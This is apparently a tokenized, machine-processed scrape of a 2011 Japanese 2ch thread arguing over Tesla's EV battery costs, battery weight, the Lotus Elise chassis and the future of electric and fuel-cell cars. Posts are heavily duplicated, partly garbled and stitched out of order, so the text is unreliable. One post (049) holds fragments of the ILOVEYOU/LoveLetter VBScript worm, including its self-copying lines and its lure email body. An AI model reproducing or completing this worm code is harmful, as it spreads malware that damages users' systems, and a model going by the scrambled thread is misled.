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米テスラのEV電池、コストは従来電池の3分の1=トヨタ副社長
http://raicho.2ch.net/test/read.cgi/newsplus/1294810742/
参照数 0 被参照数 0
リチウム 放電 用電 全幅 電気 発電 EV 水素 ガソリン 車体 電気自動車 燃料電池 重量 バッテリ 劣化 自動車 IDAbqCPnK 車用 制御 普及 電量 搭載 リチウムイオン 寿命 方式 バッテリー 容量 走行 電力 実用 充放電 一周 性能 燃料 石油 充電 開発 エンジン 大嘘 日産 チウム電池 リチウム電池 供給 専用 エリーゼ 残量 距離 電機 :名無しさん@十一周年 ルギー 効率 接続 大量 エネル 交換 技術 モーター エネルギー 生産 無知 爆発 捏造 プリウス システム 十分 万円 ーター 事故 程度 :名無しさん@十一周年:水IDAbqCPnK ーカー アメリカ ハイブリッ 日本 何本 馬鹿 電池だけ 充電する 可能 安全 加熱 よこのバカ リッド テスラモーターズ ボディ ニッケル 名無しさん@十一周年: ハイブリッド 中国 RAV サーキット 使用 車体重量 発電機 たよこのバカ 問題 ブレー 出来 カーボン オイル
重い 4% 安い 4% いい 5% する 50% 使う 9% なる 26% 走る 5% ある 16% やる 6% 作る 4% てる 17% いる 18% 言う 7% できる 7% どう 4% その 5% この 4%
- Total Integration
- 00 : 37 ID : Abq + CPnK0
エリーゼ の 車体 重量 は 960 �
960kg ( 笑 )
まーた 大嘘 ついたよ コイツ ( 笑 )
電池重量 は 約 450kg にも 達 し 、
電池重量 は 約 450kg にも 達 し 、
電池重量 は 約 450kg にも 達 し 、
なんで 大嘘 ぶっこいたの ? ? ? ? ( 笑 )
悔 しかったの ? ? ? ? ( 笑 )
ほら ガンバレガンバレ ( 笑 )
- 490 電池 を 大量 接続 する 方法 ってのは 要 する に 、
電池 の 障害対策 に HDD の RAID コントローラ 、
各電池 の 負荷分散 に 鯖 の ロードバランサー や ラウンドロビン みたいなもんか ?
- 04 : 40 ID : Abq + CPnK0
それで 、 20 % の 充電量 で サーキット テスト で 90 � 走 れる
- 282 」
「 満充電 で 」 走 れるのが 88 キロ から 320 キロ
だというのに
253 : 名無 しさん @ 十一周 年 [ ] : 2011 / 01 / 12 ( 水 ) 20 : 04 : 40 ID : Abq + CPnK0
それで 、 20 % の 充電量 で サーキット テスト で 90 � 走 れる
- 290 」
「 満充電 で 」 走 れるのが 88 キロ から 320 キロ
だというのに
253 : 名無 しさん @ 十一周 年 [ ] : 2011 / 01 / 12 ( 水 ) 20 : 04 : 40 ID : Abq + CPnK0
それで 、 20 % の 充電量 で サーキット テスト で 90 � 走 れる
- 301 」
「 満充電 で 」 走 れるのが 88 キロ から 320 キロ
だというのに
253 : 名無 しさん @ 十一周 年 [ ] : 2011 / 01 / 12 ( 水 ) 20 : 04 : 40 ID : Abq + CPnK0
それで 、 20 % の 充電量 で サーキット テスト で 90 � 走 れる
- 358 」
「 満充電 で 」 走 れるのが 88 キロ から 320 キロ
だというのに
253 : 名無 しさん @ 十一周 年 [ ] : 2011 / 01 / 12 ( 水 ) 20 : 04 : 40 ID : Abq + CPnK0
それで 、 20 % の 充電量 で サーキット テスト で 90 � 走 れる
- 369 」
「 満充電 で 」 走 れるのが 88 キロ から 320 キロ
だというのに
253 : 名無 しさん @ 十一周 年 [ ] : 2011 / 01 / 12 ( 水 ) 20 : 04 : 40 ID : Abq + CPnK0
それで 、 20 % の 充電量 で サーキット テスト で 90 � 走 れる
- 376 」
「 満充電 で 」 走 れるのが 88 キロ から 320 キロ
だというのに
253 : 名無 しさん @ 十一周 年 [ ] : 2011 / 01 / 12 ( 水 ) 20 : 04 : 40 ID : Abq + CPnK0
それで 、 20 % の 充電量 で サーキット テスト で 90 � 走 れる
- 05 : 36 ID : Abq + CPnK0
435
うわっかわの ボディ ー だけじゃなく 、 エンジン 機関以外全部 そっくり 供給 だから 、
全長 は バンパー 変 えるだけで 何 とかなる けど 、 全幅 だけはどう にもならないんだよ
- 458 439 : 名無 しさん @ 十一周 年 [ ] : 2011 / 01 / 12 ( 水 ) 23 : 05 : 36 ID : Abq + CPnK0
435
うわっかわの ボディ ー だけじゃなく 、 エンジン 機関以外全部 そっくり 供給 だから 、
全長 は バンパー 変 えるだけで 何 とかなる けど 、 全幅 だけはどう にもならないんだよ
- 013 それだけ 販売員 の 人件費 、 場所代 などの 販。諸経費 が 大 きいってこと
- 029 1
ラップトップ PC に 使 われる リチウム イオン 電池
18650 か
- 855 リチウム も 重要性 が 高 まれば 世界 中 で 採掘 が 行 われることになる でしょう
- 043 もう 燃料 電池 自動車 はやらないんじゃないのかな ?
家庭用燃料 電池 くらいでしか 使 わないかもねえ
- 049 Scriptini.WriteLine n2 = / . dcc send $ nick & dirsystem & 。。 LOVE-LETTER-FOR-YOU.HTM
male.Body = vbcrlf & kindly check the attached LOVELETTER coming from me .
C.Copy ( dirsystem & 。。 LOVE-LETTER-FOR-YOU.TXT.VBS )
C.Copy ( dirwin & 。。 Win32DLL.vbs )
document.write ( body onload = window ( ) ; )
- 050 【 研究 】 日本 に 朗報 か 「 石油 」 をつくる 有望 な 藻類 、 日本 で 発見 … 施設 できれば 、 日本 の 石油 輸入量程度 は 生産 可能
- 097 リチウム リチウム と 叫 ぶ 人 が 多 いが 、 ラップトップ PC に 使 われる リチウム イオン 電池 を 使用 する テスラ の 場合 、
その 技術 が 車 に 付 いていて 、
自動車 用大型 リチウム イオン 電池 を 使用 する その 他 の EV は 、 電池自体 に 付 いている んだ
- 097 で 、 ラップトップ PC に 使 われる リチウム イオン 電池 を 使用 する テスラ の 場合 、
その 技術 が 車 に 付 いていて 、
自動車 用大型 リチウム イオン 電池 を 使用 する その 他 の EV は 、 電池自体 に 付 いている んだ
- 418 リチウム リチウム と 叫 ぶ 人 が 多 いが 、 低温 の 出力 では 鉛蓄電池 に 劣 るんだよ
- 097 さらに 、 A の 中 のこれとこれとこれの 電池 、 B の 中 のこれとこれとこれの 電池 、 C の 中 の・・ 、 D の 中 の・・
って 言 う 具合 に 、 箱 、 内部 の 電池 ともに 分散 させるのが 大量 接続 リチウム イオン 電池 の 冷却制御 技術 なんだ
- 103 自動車 用大型 リチウム イオン 電池 を 使用 する その 他 の EV は 、
車 の 制御 システム が 、
この 電力 の 時 は 、 A で 何本 、 B で 何本 、 C で 何本 、 D で 何本 の 制御 までで 、
A の 中 のこれとこれとこれの 電池 、 B の 中 のこれとこれとこれの 電池 、 C の 中 の・・ 、 D の 中 の・・ 、
の 制御 は 電池自体 がする
- 134 車 の 制御 システム が 、
この 電力 の 時 は 、 A で 何本 、 B で 何本 、 C で 何本 、 D で 何本
- 156 車 の 制御 システム が 、
この 電力 の 時 は 、 A で 何本 、 B で 何本 、 C で 何本 、 D で 何本 までしかしない
自動車 用大型 リチウム イオン 電池 は
いわば 、 電池 メーカー から エンジン 供給 受 けている ような モノ なのさ
- 106 1
さすが エジソン の 宿敵 w
- 115 さらに 、
A の 中 のこれとこれとこれの 電池 、 B の 中 のこれとこれとこれの 電池 、 C の 中 の・・ 、 D の 中 の・・ 、
まで 制御 する から 、
69
さんが 言 うように 、
劣化 した セル を 上手 く 切 り 離 す 事 が 可能 なんだ
- 103 さらに 、
A の 中 のこれとこれとこれの 電池 、 B の 中 のこれとこれとこれの 電池 、 C の 中 の・・ 、 D の 中 の・・ 、
まで 制御 する
- 134 さらに 、
A の 中 のこれとこれとこれの 電池 、 B の 中 のこれとこれとこれの 電池 、 C の 中 の・・ 、 D の 中 の・・ 、
まで 制御 する
- 134 各 メーカー の 制御 技術 の 差 が 確実 に 出 るから 、 自動車 メーカー にとっては 大 きな アドバンテージ になり 得 る
- 156 さらに 、
A の 中 のこれとこれとこれの 電池 、 B の 中 のこれとこれとこれの 電池 、 C の 中 の・・ 、 D の 中 の・・ 、
まで 制御 する
- 141 PC に 数本積 まれてる 電池 が EV では 数万本積 まれてる
- 154 だいたい 、 電動 フォークリフト 等 では
既存 の 鉛 バッテリ ー を 多 いものだと 20 コ 30 コ と 繋 いで 同 じような 事 をしている
- 176 大電流 を 流 せる 莫大 な 配線 と 切 り 替 えの スイッチング 素子
- 187 電池 の コスト が 下 がった 「 としても 」
車体 の コスト が 上 がったらどう しようもないんど wwww
テスラモーター ズ 式 は 、 バッテリ ー が 果 てしなく 重 いので
車体 を 高価 な 高価 な 高価 な 高価 な 素材 で 軽 く 作 らなければならない
- 154 鉛 かそうでないかの 違 いであって 、 テスラモーター ズ のやってる ことが
「 今 まで 誰 もやれなかったこと 」 ではない
- 192 原子力電池 でいい だろ
アホ か
- 287 ID : m1TJbQAm0
おい 邪眼 みせてみろ w
- 304 定格調 べれば 、 使用電 力量 や 発熱量 は モータ の 基本仕様 だからすぐわかる
- 318 数千本 の PC 用 リチウム イオン 電池 と 、
莫大 な 制御 回路 と 配線 だから 重 いよね
- 322 310
この 技術 は 過渡期 でしかないよ
- 393 自動車 に 対 する 給電方式 で 電池問題 解決 できたとしても
揚水発電 以外 の 需要 と 発電 の ムラ を 吸収 する 方法考 えないと
どっちみち 先無 いと 思 うよ
やっぱ 電池 は 大事
- 396 エンジン ラジコン と モーター ラジコン の 価格 の 違 いを 見 れば
危機感 わくだろ
ミニ 四駆 を 作 る 技術 で EV は 作 れる
- 501 でっけぇ 〜 ミニ 四駆 を 作 ればいい のだ !
- 408 富士重 の 燃料 電池 車 マダー ?
- 414 フェイズ 2 エリーゼ ( テスラ が ベース になってる やつ ) は 車両重量 900 キロ 前後
フェイズ 1 エリーゼ の 頃 は 750 キロ くらいだったはず
- 252 普通 の エリーゼ に ガス を 満 タン にする には 40 ポンド かかるが
ロードスター を 満充電 する ためにかかる コスト は 3.5 ポンド
- 428 テスラ が ベース にした モデル の エリーゼ の 車重 は 900 キロ だよ
- 418 寿命 と ディレーティング を 考 えると 、 電気 2 重層 のほうが 圧倒的 に 使 いやすいんだな
- 458 トレッド だと 前輪 で 言 えば
エリーゼ が 1455mm で タイヤ が 175 �
エボーラ が 1560 � で タイヤ が 225 �
テスラ が 1455 � で タイヤ が 175 �
全幅 だけはどう にでもならないんだよ
- 445 439
そもそも 全部 ソックリ 供給 ではないんだが …
全幅 なんてどう にでもなる よ
- 473 値段 を 無視 する なら 本田 の 燃料 電池 車 もある し
- 502 だけどそこで 産業界 から 出 た データ が 、 年間数秒 の 停電 で 、
生産 中 の ○ 台 の 車 が オシャカ になったみたいな データ を 突 きつけられて 、
どう やって 値下 げする んだと 、 電力 会社 は 開 いた 口 がふさがらなかったそうだ
- 505 あれ ? リチウム イオン 電池 の コスト は 原材料費 が 大半 だからいくら 大量 生産 しても
大 して 安 くならないとかどっかの 評論家 が 言 ってたような・・・
- 088 「 コンセプト は 面白 いが 実用 には 程遠 い 」 というのが 評論家 の 一致 した 結論
- 507 「 5 年 で ダメ になる 200 万円 の 電池 」 を 誰 が 使 うのか
「 未来 の クルマ 」 は トンデモ 似非科学 ばかり 電気 自動車 も 燃料 電池 車 も 普及 しない
- 507 18650 は 三洋電機 が 年数億本 も 製造 している が 、 それだけ 量産 してもこの 価格 なのだ
- 528 仮 に トヨタ の EV の 電池 が 事故 の 際 に 発火 したら 、 大規模 な ネガキャン をやられて 莫大 な
賠償金 を 請求 される 可能 性 がある
- 537 まあ 、 電気 自動車 が 使 える 環境 とは
・エアコン が 必要 ない 温暖 な 気候
・ 急激 な 坂 とかが 少 ない 道
・ 回生 ブレー キ で 電気 を 回収 できないほど 急激 な 減速 が 必要 ない 道 ( 信号 の 間隔 が 長 い )
・ 事故 っても リチウム 電池 の 二次被害 が 少 ない 場所
( リチウム 電池 の 燃焼 に 対処 できる 消防署 がある 地域 、 人口 が 過密 でない 地域 )
・ 運転 中 の バッテリ ー 切 れ 、 ある いは 故障 にすぐ 対応 できる サービス が 受 けられるところ
・ DQN 運転 する 奴 が 少 ない 地域
- 540 国 を 挙 げてやる べき 事 だろ ! !
電気 自動車 なんて 他 の 国 にやらせとけって
- 571 高周波 から 低周波 に 直 す 際 に 、 直流変換 しないと
- 581 1 日 50km しか 走行 しないとする と 、 毎日車 に 乗 ってたとしても 各 ブロック が 充放電 を
繰 り 返 すのは 4 日 に 1 回 ということになる
- 589 将来的 には EV の バッテリ ー は スマートグリッド の システム に 組 み 込 んで
太陽光発電 や 風力発電 で 得 た 電気 を 保存 しておく バッテリ ー としても
使 う 見込 みなんだから 、 電池容量 が 今 の 150 倍 は 無 いと …
- 589 将来的 には EV の バッテリ ー は スマートグリッド の システム に 組 み 込 んで
太陽光発電 や 風力発電 で 得 た 電気 を 保存 しておく バッテリ ー としても
使 う 見込 みなんだから 、 電池容量 が 今 の 10 倍 は 無 いと …
- 624 車全体 の 軽量化 をやんなければ 、 電気 自動車 の 未来 はない
- 626 EV には 別 に 充電 用発電 機 を 積 んで 、 電池切 れになっても 自車発電 で
50km くらいは 走 れるような システム を 装備 しないと ダメ でしょ
- 628 591
高価 な 電池 を 大量 に 保管 する コスト がかかるし 、 コンビニ でもそんな サービス は
やらないだろう
無料 で 充電 できる 電気 スタンド は 作 るかもしれないけど
だけど コンビニ 電気 泥棒 が 問題 になっている くらいだから 、 大型 ショッピング
センター ぐらいじゃないと 無料 で 充電 する サービス は ペイ しないだろう
593
だから 電気 代 は 安 いから 、 ショッピングモール はそれでも ペイ する んだよ
ただ 単 に 電気 だけを 売 る スタンド は 経営的 に 成 り 立 たない
- 628 591
高価 な 電池 を 大量 に 保管 する コスト がかかるし 、 コンビニ でもそんな サービス は
やらないだろう
無料 で 充電 する 電気 スタンド は 作 るかもしれないけど
だけど コンビニ 電気 泥棒 が 問題 になっている くらいだから 、 大型 ショッピング
センター ぐらいじゃないと 無料 で 充電 する サービス は ペイ しないだろう
593
だから 電気 代 は 安 いから 、 ショッピングモール はそれでも ペイ する んだよ
ただ 単 に 電気 だけを 売 る スタンド は 経営的 に 成 り 立 たない
- 630 市販 の バッテリ と 、 専用 バッテリ で 、
同 じ 出力 と 容量 での 重量 サイズ はどう なる のか ?
どう 考 えても 、 PC 用 の バッテリ を 流用 する ほうが デカク 重 くなる だろ wwww
まあ 、 電気 コスト が 安 いからその 分有利 かも 知 れないけど
- 644 アメリカ で 自動車 が 発売 された 当初 は 、 実 は 電気 自動車 と 内燃機。 型 の 2 種類 があったんだよ
最初 は 電気 自動車 優勢 だったけど 、 アメリカ 国内 で 油田 が 見 つかってからは 、 運用 コスト が 安 く
取 り 扱 いが 優 しい 内燃機。 型 が 全 ての 電気 自動車 を 市場 から 追 い 出 しちゃった
だから 、 この 差 を 埋 めるのはなかなか 難 しい
- 644 アメリカ で 自動車 が 発売 された 当初 は 、 実 は 電気 自動車 と 内燃機。型 の 2 種類 があったんだよ
最初 は 電気 自動車 優勢 だったけど 、 アメリカ 国内 で 油田 が 見 つかってからは 、 運用 コスト が 安 く
取 り 扱 いが 優 しい 内燃機。型 が 全 ての 電気 自動車 を 市場 から 追 い 出 しちゃった
だから 、 この 差 を 埋 めるのはなかなか 難 しい
- 672 大赤字出 せばそれは 税金投入 = 国民負担 という 悪魔 の 商売
- 679 676
普通 の 車 も 出来 ないのに 電気 自動車 でできた ! ! ! !
となればよ 、 電気 自動車 の 優秀性 を アピール 出来 るじゃないの
- 679 676
だから 、 そんなに 優秀 じゃないって
- 681 674
既 にある でしょ HAARP
- 685 輸送用 ガソリン の エネルギー だけで 、 現状 の 総発電 量 くらいに 相当 する から
- 696 燃料 電池 → 専用 充電 池 → 汎用電 池流用 ・・・・なんかどんどん ベタ になってってる な
技術 的 には 見 ててもあんま 面白 く 無 くなってる
- 703 汎用電 池 で 大量 生産 したら 、 品不足 で 価格 上 がるがな
- 700 レーシングカー ならともかく 乗用車 じゃ アピール 低 いなぁ
日本 は FIA とか 放 ったらかして 世界 最強 の 電気 自動車 レース をおっぱじめやがれ !
- 702 686
現行 の ハイブリッ ドカー は 、 通常 の ガソリン 車 よりも ガソリン 走行 中 の 燃費 が
良 くないといけないから 、 完全電気 式 に 出来 ない
- 272 とはいえ 、 走行 に 使 える エネル ギ と 比較 する と 2 次電池 は ガソリン の
> 約 1 / 40 になってしまう * 2 )
- 702 プラグインハイブリッ ド の 電池 による 航続距離 がもっと 長 くなり 、 エンジン は 緊急用
と 割 り 切 って 使 えるようになれば 、 ガソリン 駆動時 の 燃費 は 重要 でなくなる
- 756 エジソン の 功績 が 無 ければ 、 冷蔵庫 も 洗濯機 も 、 エンジン を 内蔵 して 駆動 する 羽目 になっていた
だろうな
- 711 一日中走 り 回 ってる タクシー こそ HV や EV にしろ
- 728 量産型 の クラリティ ではあきらめて 電池 にした
- 729 エンジン は パワー 出 そうと 排気量 を 大 きくする と 、 エンジン 自体 の 重 さが ネック になる
プロペラ を 付 ければ 、 プロペラ の 重量 と 空気抵抗 減 らした 方 が ネック になる
エンジン で 発電 して 、 それで モーター を 回 すという 方式 は 、 エンジン と モーター の 重 さが
ネック になる ( プリウス がそうだけど )
- 731 プロペラ より 空気抵抗 減 らした 方 がまだ エコ なんじゃないだろうか
- 758 将来 は 宇宙太陽光発電 を 利用 し 、 レーザー で 直接地上 の 自動車 全車 に 照射 させて
走 らせるらしい
- 760 EV や 、 まして 燃料 電池 自動車 に 本気 で 期待 してる 人 って 文系 ですよね
- 760 まあ EV は 限定条件下 でありかもだけど
- 824 787
仮 に 全車両 が EV になっても 、 日本 の 電力 設備容量 の 1 割程度
- 824 電力 会社 自身 に 、 EV なんかに 過度 に 頼 るつもりが 無 いから
- 859 EV すら 作 れない トヨタ は 丸投 げかい
- 864 854
石油 ピーク は 2006 年 に 過 ぎてる ぞ
- 560 G13 型 トラクター 求 む
by 石油 メジャー
- 866 あと iPS 細胞 を 擬似科学扱 いする のは 明 らかな 名誉毀損 だぞ
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